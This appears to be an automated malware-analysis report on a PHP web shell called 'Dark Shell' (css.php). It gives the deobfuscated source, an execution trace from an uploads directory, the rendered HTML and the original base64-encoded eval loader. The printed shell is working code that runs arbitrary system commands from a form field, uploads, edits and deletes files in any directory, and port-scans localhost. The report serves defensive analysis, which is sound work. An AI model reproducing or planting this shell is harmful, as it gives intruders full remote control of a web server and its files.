PHP Malware Analysis
css.php
md5: 8d8834309fd7627b80d00cfa602fef48
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Original, Traces)
- system (Deobfuscated)
Files
- copy (Deobfuscated)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Deobfuscated PHP code
<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
eval /* PHPDeobfuscator eval output */ {
error_reporting(0);
set_time_limit(0);
if (empty($_GET['dir'])) {
$dir = getcwd();
} else {
$dir = $_GET['dir'];
}
chdir($dir);
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd() . "<br>\n";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '" . $current . "&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '" . $current . "&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";
$mode = $_GET['mode'];
switch ($mode) {
case 'edit':
$file = $_GET['file'];
$new = $_POST['new'];
if (empty($new)) {
$fp = fopen($file, "r");
$file_cont = fread($fp, filesize($file));
$file_cont = str_replace("</textarea>", "<textarea>", $file_cont);
echo "<form action = '" . $current . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
echo "File: " . $file . "<br>\n";
echo "<textarea name = 'new' rows = '30' cols = '50'>" . $file_cont . "</textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
} else {
$fp = fopen($file, "w");
if (fwrite($fp, $new)) {
echo $file . " edited.<p>";
} else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose($fp);
break;
case 'delete':
$file = $_GET['file'];
if (unlink($file)) {
echo $file . " deleted successfully.<p>";
} else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
} else {
if (copy($src, $dst)) {
echo "File copied successfully.<p>\n";
} else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET['src'];
$dst = $_POST['dst'];
if (empty($dst)) {
echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
} else {
if (rename($src, $dst)) {
echo "File moved successfully.<p>\n";
} else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET['old'];
$new = $_POST['new'];
if (empty($new)) {
echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
} else {
if (rename($old, $new)) {
echo "File/Directory renamed successfully.<p>\n";
} else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;
case 'rmdir':
$rm = $_GET['rm'];
if (rmdir($rm)) {
echo "Directory removed successfully.<p>\n";
} else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'system':
$cmd = $_POST['cmd'];
if (empty($cmd)) {
echo "<form action = '" . $current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
} else {
system($cmd);
}
break;
case 'create':
$new = $_POST['new'];
if (empty($new)) {
echo "<form action = '" . $current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
} else {
if ($fp = fopen($new, "w")) {
echo "File created successfully.<p>\n";
} else {
echo "Unable to create " . $file . ".<p>\n";
}
fclose($fp);
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty($file)) {
echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
} else {
if (move_uploaded_file($temp, $file)) {
echo "File uploaded successfully.<p>\n";
unlink($temp);
} else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;
case 'port_scan':
$port_range = $_POST['port_range'];
if (empty($port_range)) {
echo "<table><form action = '" . $current . "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
} else {
$range = explode(":", $port_range);
if (!is_numeric($range[0]) or !is_numeric($range[1])) {
echo "Bad parameters.<br>";
} else {
$host = 'localhost';
$from = $range[0];
$to = $range[1];
echo "Open ports:<br>";
while ($from <= $to) {
$var = 0;
$fp = fsockopen($host, $from) or $var = 1;
if (false) {
echo $from . "<br>";
}
$from++;
fclose($fp);
}
}
}
break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
if (is_file($file)) {
$size = round(filesize($file) / 1024, 2);
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $size . " KB</td>";
echo "<td><a href = " . $current . "&mode=edit&file=" . $file . ">Edit</a></td>\n";
echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>\n";
echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>\n";
echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>\n";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>\n";
} else {
$items = scandir($file);
$items_num = count($items) - 2;
echo "<tr><td>" . $file . "</td>";
echo "<td>" . $items_num . " Items</td>";
echo "<td><a href = " . $current . "/" . $file . ">Change directory</a></td>\n";
echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>\n";
echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
};Execution traces
data/traces/8d8834309fd7627b80d00cfa602fef48_trace-1676260312.5955.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:52:18.493361]
1 0 1 0.000196 393512
1 3 0 0.000288 406064 {main} 1 /var/www/html/uploads/css.php 0 0
2 4 0 0.000306 406064 base64_decode 0 /var/www/html/uploads/css.php 30 1 '\r\nZXJyb3JfcmVwb3J0aW5nICgwKTsKc2V0X3RpbWVfbGltaXQgKDApOwppZiAoZW1wdHkgKCRfR0VUIFsnZGlyJ10pKXsKJGRpciA9IGdldGN3ZCAoKTsKfQplbHNlIHsKJGRpciA9ICRfR0VUIFsnZGlyJ107Cn0KY2hkaXIgKCRkaXIpOwokY3VycmVudCA9IGh0bWxlbnRpdGllcyAoJF9TRVJWRVIgWydQSFBfU0VMRiddIC4gIj9kaXI9IiAuICRkaXIpOwoKZWNobyAiPGNlbnRlcj48aDE+RGFyayBTaGVsbDwvaDE+PC9jZW50ZXI+PHA+PGhyPjxwPlxuIjsKZWNobyAiPGk+U2VydmVyOiAiIC4gJF9TRVJWRVIgWydTRVJWRVJfTkFNRSddIC4gIjxicj5cbiI7CmVjaG8gIkN1cnJlbnQgZGlyZWN0b3J5OiAiIC4gZ2V0Y3dkICgpIC4gIjxicj5cbiI7CmVjaG8gIlNvZnR3YXJl'
2 4 1 0.000362 418384
2 4 R 'error_reporting (0);\nset_time_limit (0);\nif (empty ($_GET [\'dir\'])){\n$dir = getcwd ();\n}\nelse {\n$dir = $_GET [\'dir\'];\n}\nchdir ($dir);\n$current = htmlentities ($_SERVER [\'PHP_SELF\'] . "?dir=" . $dir);\n\necho "<center><h1>Dark Shell</h1></center><p><hr><p>\\n";\necho "<i>Server: " . $_SERVER [\'SERVER_NAME\'] . "<br>\\n";\necho "Current directory: " . getcwd () . "<br>\\n";\necho "Software: " . $_SERVER [\'SERVER_SOFTWARE\'] . "<pre>\\n\\n</pre></i>\\n";\necho "<pre>\\n\\n\\n</pre>";\n\necho "'
2 5 0 0.000626 455504 eval 1 'error_reporting (0);\nset_time_limit (0);\nif (empty ($_GET [\'dir\'])){\n$dir = getcwd ();\n}\nelse {\n$dir = $_GET [\'dir\'];\n}\nchdir ($dir);\n$current = htmlentities ($_SERVER [\'PHP_SELF\'] . "?dir=" . $dir);\n\necho "<center><h1>Dark Shell</h1></center><p><hr><p>\\n";\necho "<i>Server: " . $_SERVER [\'SERVER_NAME\'] . "<br>\\n";\necho "Current directory: " . getcwd () . "<br>\\n";\necho "Software: " . $_SERVER [\'SERVER_SOFTWARE\'] . "<pre>\\n\\n</pre></i>\\n";\necho "<pre>\\n\\n\\n</pre>";\n\necho "<table width = 50%>";\necho "<tr>";\necho "<td><a href = \'".$current."&mode=system\'>Shell Command</a></td>\\n";\necho "<td><a href = \'".$current."&mode=create\'>Create a new file</a></td>\\n";\necho "<td><a href = \'".$current."&mode=upload\'>Upload file</a></td>\\n";\necho "<td><a href = \'".$current."&mode=port_scan\'>Port Scan</a></td>\\n";\necho "</tr></table>";\necho "<pre>\\n\\n</pre>";\n\n\n\n$mode = $_GET [\'mode\'];\nswitch ($mode){\ncase \'edit\':\n$file = $_GET [\'file\'];\n$new = $_POST [\'new\'];\nif (empty ($new)){\n$fp = fopen ($file, "r");\n$file_cont = fread ($fp, filesize ($file));\n$file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);\necho "<form action = \'".$current."&mode=edit&file=".$file."\' method = \'POST\'>\\n";\necho "File: ". $file . "<br>\\n";\necho "<textarea name = \'new\' rows = \'30\' cols = \'50\'>".$file_cont."</textarea><br>\\n";\necho "<input type = \'submit\' value = \'Edit\'></form>\\n";\n}\nelse {\n$fp = fopen ($file, "w");\nif (fwrite ($fp, $new)){\necho $file . " edited.<p>";\n}\nelse {\necho "Unable to edit " . $file . ".<p>";\n}\n}\nfclose ($fp);\nbreak;\ncase \'delete\':\n$file = $_GET [\'file\'];\nif (unlink ($file)){\necho $file . " deleted successfully.<p>";\n}\nelse {\necho "Unable to delete " . $file . ".<p>";\n}\nbreak;\ncase \'copy\':\n$src = $_GET [\'src\'];\n$dst = $_POST [\'dst\'];\nif (empty ($dst)){\necho "<form action = \'".$current . "&mode=copy&src=" . $src . "\' method = \'POST\'>\\n";\necho "Destination: <input name = \'dst\'><br>\\n";\necho "<input type = \'submit\' value = \'Copy\'></form>\\n";\n}\nelse {\nif (copy ($src, $dst)){\necho "File copied successfully.<p>\\n";\n}\nelse {\necho "Unable to copy " . $src . ".<p>\\n";\n}\n}\nbreak;\ncase \'move\':\n$src = $_GET [\'src\'];\n$dst = $_POST [\'dst\'];\nif (empty ($dst)){\necho "<form action = \'".$current . "&mode=move&src=" . $src . "\' method = \'POST\'>\\n";\necho "Destination: <input name = \'dst\'><br>\\n";\necho "<input type = \'submit\' value = \'Move\'></form>\\n";\n}\nelse {\nif (rename ($src, $dst)){\necho "File moved successfully.<p>\\n";\n}\nelse {\necho "Unable to move " . $src . ".<p>\\n";\n}\n}\nbreak;\ncase \'rename\':\n$old = $_GET [\'old\'];\n$new = $_POST [\'new\'];\nif (empty ($new)){\necho "<form action = \'".$current . "&mode=rename&old=" . $old . "\' method = \'POST\'>\\n";\necho "New name: <input name = \'new\'><br>\\n";\necho "<input type = \'submit\' value = \'Rename\'></form>\\n";\n}\nelse {\nif (rename ($old, $new)){\necho "File/Directory renamed successfully.<p>\\n";\n}\nelse {\necho "Unable to rename " . $old . ".<p>\\n";\n}\n}\nbreak;\n\ncase \'rmdir\':\n$rm = $_GET [\'rm\'];\nif (rmdir ($rm)){\necho "Directory removed successfully.<p>\\n";\n}\nelse {\necho "Unable to remove " . $rm . ".<p>\\n";\n}\nbreak;\ncase \'system\':\n$cmd = $_POST [\'cmd\'];\nif (empty ($cmd)){\necho "<form action = \'".$current . "&mode=system\' method = \'POST\'>\\n";\necho "Shell Command: <input name = \'cmd\'>\\n";\necho "<input type = \'submit\' value = \'Run\'></form><p>\\n";\n}\nelse {\nsystem ($cmd);\n}\nbreak;\ncase \'create\':\n$new = $_POST [\'new\'];\nif (empty ($new)){\necho "<form action = \'".$current . "&mode=create\' method = \'POST\'>\\n";\necho "<tr><td>New file: <input name = \'new\'></td>\\n";\necho "<td><input type = \'submit\' value = \'Create\'></td></tr></form>\\n<p>";\n}\nelse {\nif ($fp = fopen ($new, "w")){\necho "File created successfully.<p>\\n";\n}\nelse {\necho "Unable to create ".$file.".<p>\\n";\n}\nfclose ($fp);\n}\nbreak;\ncase \'upload\':\n$temp = $_FILES[\'upload_file\'][\'tmp_name\'];\n$file = basename($_FILES[\'upload_file\'][\'name\']);\nif (empty ($file)){\necho "<form action = \'".$current . "&mode=upload\' method = \'POST\' ENCTYPE=\'multipart/form-data\'>\\n";\necho "Local file: <input type = \'file\' name = \'upload_file\'>\\n";\necho "<input type = \'submit\' value = \'Upload\'>\\n";\necho "</form>\\n<pre>\\n\\n</pre>";\n}\nelse {\nif(move_uploaded_file($temp,$file)){\necho "File uploaded successfully.<p>\\n";\nunlink ($temp);\n}\nelse {\necho "Unable to upload " . $file . ".<p>\\n";\n}\n}\nbreak;\n\ncase \'port_scan\':\n$port_range = $_POST [\'port_range\'];\nif (empty ($port_range)){\necho "<table><form action = \'".$current. "&mode=port_scan\' method = \'POST\'>";\necho "<tr><td><input type = \'text\' name = \'port_range\'></td><td>";\necho "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";\necho "<tr><td><input type = \'submit\' value = \'Port Scan\'></td></tr></form></table>";\n}\nelse {\n$range = explode (":", $port_range);\nif ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){\necho "Bad parameters.<br>";\n}\nelse {\n$host = \'localhost\';\n$from = $range [0];\n$to = $range [1];\necho "Open ports:<br>";\nwhile ($from <= $to){\n$var = 0;\n$fp = fsockopen ($host, $from) or $var = 1;\nif ($var == 0){\necho $from . "<br>";\n}\n$from++;\nfclose ($fp);\n}\n}\n}\nbreak;\n\n\n}\n\nclearstatcache ();\n\necho "<pre>\\n\\n</pre>";\necho "<table width = 100%>\\n";\n$files = scandir ($dir);\nforeach ($files as $file){\nif (is_file ($file)){\n\n$size = round (filesize ($file) / 1024, 2);\necho "<tr><td>".$file."</td>";\necho "<td>".$size." KB</td>";\necho "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\\n";\necho "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\\n";\necho "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\\n";\necho "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\\n";\necho "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\\n";\n}\nelse {\n$items = scandir ($file);\n$items_num = count ($items) - 2;\necho "<tr><td>".$file."</td>";\necho "<td>".$items_num." Items</td>";\necho "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\\n";\necho "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\\n";\necho "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\\n";\n}\n}\necho "</table>\\n";\n' /var/www/html/uploads/css.php 30 0
3 6 0 0.000778 455504 error_reporting 0 /var/www/html/uploads/css.php(30) : eval()'d code 1 1 0
3 6 1 0.000794 455544
3 6 R 22527
3 7 0 0.000809 455504 set_time_limit 0 /var/www/html/uploads/css.php(30) : eval()'d code 2 1 0
3 7 1 0.000826 455568
3 7 R FALSE
3 8 0 0.000841 455536 getcwd 0 /var/www/html/uploads/css.php(30) : eval()'d code 4 0
3 8 1 0.000856 455584
3 8 R '/var/www/html/uploads'
2 A /var/www/html/uploads/css.php(30) : eval()'d code 4 $dir = '/var/www/html/uploads'
3 9 0 0.000885 455584 chdir 0 /var/www/html/uploads/css.php(30) : eval()'d code 9 1 '/var/www/html/uploads'
3 9 1 0.000902 455672
3 9 R TRUE
3 10 0 0.000917 455712 htmlentities 0 /var/www/html/uploads/css.php(30) : eval()'d code 10 1 '/uploads/css.php?dir=/var/www/html/uploads'
3 10 1 0.000936 455904
3 10 R '/uploads/css.php?dir=/var/www/html/uploads'
2 A /var/www/html/uploads/css.php(30) : eval()'d code 10 $current = '/uploads/css.php?dir=/var/www/html/uploads'
3 11 0 0.000966 455792 getcwd 0 /var/www/html/uploads/css.php(30) : eval()'d code 14 0
3 11 1 0.000979 455840
3 11 R '/var/www/html/uploads'
2 A /var/www/html/uploads/css.php(30) : eval()'d code 29 $mode = NULL
3 12 0 0.001011 455792 clearstatcache 0 /var/www/html/uploads/css.php(30) : eval()'d code 206 0
3 12 1 0.001024 455792
3 12 R NULL
3 13 0 0.001038 455792 scandir 0 /var/www/html/uploads/css.php(30) : eval()'d code 210 1 '/var/www/html/uploads'
3 13 1 0.001079 456408
3 13 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'css.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 210 $files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'css.php', 4 => 'data', 5 => 'prepend.php']
3 14 0 0.001119 456376 is_file 0 /var/www/html/uploads/css.php(30) : eval()'d code 212 1 '.'
3 14 1 0.001135 456424
3 14 R FALSE
3 15 0 0.001148 456384 scandir 0 /var/www/html/uploads/css.php(30) : eval()'d code 224 1 '.'
3 15 1 0.001171 457000
3 15 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'css.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 224 $items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'css.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 225 $items_num = 4
3 16 0 0.001222 456968 is_file 0 /var/www/html/uploads/css.php(30) : eval()'d code 212 1 '..'
3 16 1 0.001237 457008
3 16 R FALSE
3 17 0 0.001251 456968 scandir 0 /var/www/html/uploads/css.php(30) : eval()'d code 224 1 '..'
3 17 1 0.001274 457472
3 17 R [0 => '.', 1 => '..', 2 => 'uploads']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 224 $items = [0 => '.', 1 => '..', 2 => 'uploads']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 225 $items_num = 1
3 18 0 0.001318 456856 is_file 0 /var/www/html/uploads/css.php(30) : eval()'d code 212 1 '.htaccess'
3 18 1 0.001333 456904
3 18 R TRUE
3 19 0 0.001347 456864 filesize 0 /var/www/html/uploads/css.php(30) : eval()'d code 214 1 '.htaccess'
3 19 1 0.001361 456904
3 19 R 64
3 20 0 0.001373 456864 round 0 /var/www/html/uploads/css.php(30) : eval()'d code 214 2 0.0625 2
3 20 1 0.001388 456936
3 20 R 0.06
2 A /var/www/html/uploads/css.php(30) : eval()'d code 214 $size = 0.06
3 21 0 0.001415 456864 is_file 0 /var/www/html/uploads/css.php(30) : eval()'d code 212 1 'css.php'
3 21 1 0.001430 456896
3 21 R TRUE
3 22 0 0.001443 456856 filesize 0 /var/www/html/uploads/css.php(30) : eval()'d code 214 1 'css.php'
3 22 1 0.001457 456896
3 22 R 8585
3 23 0 0.001469 456856 round 0 /var/www/html/uploads/css.php(30) : eval()'d code 214 2 8.3837890625 2
3 23 1 0.001483 456928
3 23 R 8.38
2 A /var/www/html/uploads/css.php(30) : eval()'d code 214 $size = 8.38
3 24 0 0.001510 456856 is_file 0 /var/www/html/uploads/css.php(30) : eval()'d code 212 1 'data'
3 24 1 0.001525 456896
3 24 R FALSE
3 25 0 0.001537 456856 scandir 0 /var/www/html/uploads/css.php(30) : eval()'d code 224 1 'data'
3 25 1 0.001562 457384
3 25 R [0 => '.', 1 => '..', 2 => 'trace-1676260312.5955.xt.gz']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 224 $items = [0 => '.', 1 => '..', 2 => 'trace-1676260312.5955.xt.gz']
2 A /var/www/html/uploads/css.php(30) : eval()'d code 225 $items_num = 1
3 26 0 0.001609 456880 is_file 0 /var/www/html/uploads/css.php(30) : eval()'d code 212 1 'prepend.php'
3 26 1 0.001625 456928
3 26 R TRUE
3 27 0 0.001638 456888 filesize 0 /var/www/html/uploads/css.php(30) : eval()'d code 214 1 'prepend.php'
3 27 1 0.001652 456928
3 27 R 57
3 28 0 0.001664 456888 round 0 /var/www/html/uploads/css.php(30) : eval()'d code 214 2 0.0556640625 2
3 28 1 0.001678 456960
3 28 R 0.06
2 A /var/www/html/uploads/css.php(30) : eval()'d code 214 $size = 0.06
2 5 1 0.001707 456888
1 3 1 0.001719 416688
0.001760 323968
TRACE END [2023-02-13 01:52:18.494969]
Generated HTML code
<html><head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<center><h1>Dark Shell</h1></center><p></p><hr><p>
<i>Server: localhost<br>
Current directory: /var/www/html<br>
Software: Apache/2.4.52 (Ubuntu)</i></p><pre><i>
</i></pre>
<pre>
</pre><table width="50%"><tbody><tr><td><a href="/css.php?dir=/var/www/html&mode=system">Shell Command</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=create">Create a new file</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=upload">Upload file</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=port_scan">Port Scan</a></td>
</tr></tbody></table><pre>
</pre><pre>
</pre><table width="100%">
<tbody><tr><td>.</td><td>2 Items</td><td><a href="/css.php?dir=/var/www/html/.">Change directory</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=rmdir&rm=.">Remove directory</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=rename&old=.">Rename directory</a></td></tr>
<tr><td>..</td><td>4 Items</td><td><a href="/css.php?dir=/var/www/html/..">Change directory</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=rmdir&rm=..">Remove directory</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=rename&old=..">Rename directory</a></td></tr>
<tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/css.php?dir=/var/www/html&mode=edit&file=beneri.se_malware_analysis">Edit</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=delete&file=beneri.se_malware_analysis">Delete</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=copy&src=beneri.se_malware_analysis">Copy</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=move&src=beneri.se_malware_analysis">Move</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=rename&old=beneri.se_malware_analysis">Remame</a></td></tr>
<tr><td>css.php</td><td>8.38 KB</td><td><a href="/css.php?dir=/var/www/html&mode=edit&file=css.php">Edit</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=delete&file=css.php">Delete</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=copy&src=css.php">Copy</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=move&src=css.php">Move</a></td>
<td><a href="/css.php?dir=/var/www/html&mode=rename&old=css.php">Remame</a></td></tr>
</tbody></table>
</body></html>Original PHP code
<html>
<head>
<title>
Dark Shell
</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
eval(base64_decode('
ZXJyb3JfcmVwb3J0aW5nICgwKTsKc2V0X3RpbWVfbGltaXQgKDApOwppZiAoZW1wdHkgKCRfR0VUIFsnZGlyJ10pKXsKJGRpciA9IGdldGN3ZCAoKTsKfQplbHNlIHsKJGRpciA9ICRfR0VUIFsnZGlyJ107Cn0KY2hkaXIgKCRkaXIpOwokY3VycmVudCA9IGh0bWxlbnRpdGllcyAoJF9TRVJWRVIgWydQSFBfU0VMRiddIC4gIj9kaXI9IiAuICRkaXIpOwoKZWNobyAiPGNlbnRlcj48aDE+RGFyayBTaGVsbDwvaDE+PC9jZW50ZXI+PHA+PGhyPjxwPlxuIjsKZWNobyAiPGk+U2VydmVyOiAiIC4gJF9TRVJWRVIgWydTRVJWRVJfTkFNRSddIC4gIjxicj5cbiI7CmVjaG8gIkN1cnJlbnQgZGlyZWN0b3J5OiAiIC4gZ2V0Y3dkICgpIC4gIjxicj5cbiI7CmVjaG8gIlNvZnR3YXJlOiAiIC4gJF9TRVJWRVIgWydTRVJWRVJfU09GVFdBUkUnXSAuICI8cHJlPlxuXG48L3ByZT48L2k+XG4iOwplY2hvICI8cHJlPlxuXG5cbjwvcHJlPiI7CgplY2hvICI8dGFibGUgd2lkdGggPSA1MCU+IjsKZWNobyAiPHRyPiI7CmVjaG8gIjx0ZD48YSBocmVmID0gJyIuJGN1cnJlbnQuIiZtb2RlPXN5c3RlbSc+U2hlbGwgQ29tbWFuZDwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAnIi4kY3VycmVudC4iJm1vZGU9Y3JlYXRlJz5DcmVhdGUgYSBuZXcgZmlsZTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAnIi4kY3VycmVudC4iJm1vZGU9dXBsb2FkJz5VcGxvYWQgZmlsZTwvYT48L3RkPlxuIjsKZWNobyAiPHRkPjxhIGhyZWYgPSAnIi4kY3VycmVudC4iJm1vZGU9cG9ydF9zY2FuJz5Qb3J0IFNjYW48L2E+PC90ZD5cbiI7CmVjaG8gIjwvdHI+PC90YWJsZT4iOwplY2hvICI8cHJlPlxuXG48L3ByZT4iOwoKCgokbW9kZSA9ICRfR0VUIFsnbW9kZSddOwpzd2l0Y2ggKCRtb2RlKXsKY2FzZSAnZWRpdCc6CiRmaWxlID0gJF9HRVQgWydmaWxlJ107CiRuZXcgPSAkX1BPU1QgWyduZXcnXTsKaWYgKGVtcHR5ICgkbmV3KSl7CiRmcCA9IGZvcGVuICgkZmlsZSwgInIiKTsKJGZpbGVfY29udCA9IGZyZWFkICgkZnAsIGZpbGVzaXplICgkZmlsZSkpOwokZmlsZV9jb250ID0gc3RyX3JlcGxhY2UgKCI8L3RleHRhcmVhPiIsICI8dGV4dGFyZWE+IiwgJGZpbGVfY29udCk7CmVjaG8gIjxmb3JtIGFjdGlvbiA9ICciLiRjdXJyZW50LiImbW9kZT1lZGl0JmZpbGU9Ii4kZmlsZS4iJyBtZXRob2QgPSAnUE9TVCc+XG4iOwplY2hvICJGaWxlOiAiLiAkZmlsZSAuICI8YnI+XG4iOwplY2hvICI8dGV4dGFyZWEgbmFtZSA9ICduZXcnIHJvd3MgPSAnMzAnIGNvbHMgPSAnNTAnPiIuJGZpbGVfY29udC4iPC90ZXh0YXJlYT48YnI+XG4iOwplY2hvICI8aW5wdXQgdHlwZSA9ICdzdWJtaXQnIHZhbHVlID0gJ0VkaXQnPjwvZm9ybT5cbiI7Cn0KZWxzZSB7CiRmcCA9IGZvcGVuICgkZmlsZSwgInciKTsKaWYgKGZ3cml0ZSAoJGZwLCAkbmV3KSl7CmVjaG8gJGZpbGUgLiAiIGVkaXRlZC48cD4iOwp9CmVsc2UgewplY2hvICJVbmFibGUgdG8gZWRpdCAiIC4gJGZpbGUgLiAiLjxwPiI7Cn0KfQpmY2xvc2UgKCRmcCk7CmJyZWFrOwpjYXNlICdkZWxldGUnOgokZmlsZSA9ICRfR0VUIFsnZmlsZSddOwppZiAodW5saW5rICgkZmlsZSkpewplY2hvICRmaWxlIC4gIiBkZWxldGVkIHN1Y2Nlc3NmdWxseS48cD4iOwp9CmVsc2UgewplY2hvICJVbmFibGUgdG8gZGVsZXRlICIgLiAkZmlsZSAuICIuPHA+IjsKfQpicmVhazsKY2FzZSAnY29weSc6CiRzcmMgPSAkX0dFVCBbJ3NyYyddOwokZHN0ID0gJF9QT1NUIFsnZHN0J107CmlmIChlbXB0eSAoJGRzdCkpewplY2hvICI8Zm9ybSBhY3Rpb24gPSAnIi4kY3VycmVudCAuICImbW9kZT1jb3B5JnNyYz0iIC4gJHNyYyAuICInIG1ldGhvZCA9ICdQT1NUJz5cbiI7CmVjaG8gIkRlc3RpbmF0aW9uOiA8aW5wdXQgbmFtZSA9ICdkc3QnPjxicj5cbiI7CmVjaG8gIjxpbnB1dCB0eXBlID0gJ3N1Ym1pdCcgdmFsdWUgPSAnQ29weSc+PC9mb3JtPlxuIjsKfQplbHNlIHsKaWYgKGNvcHkgKCR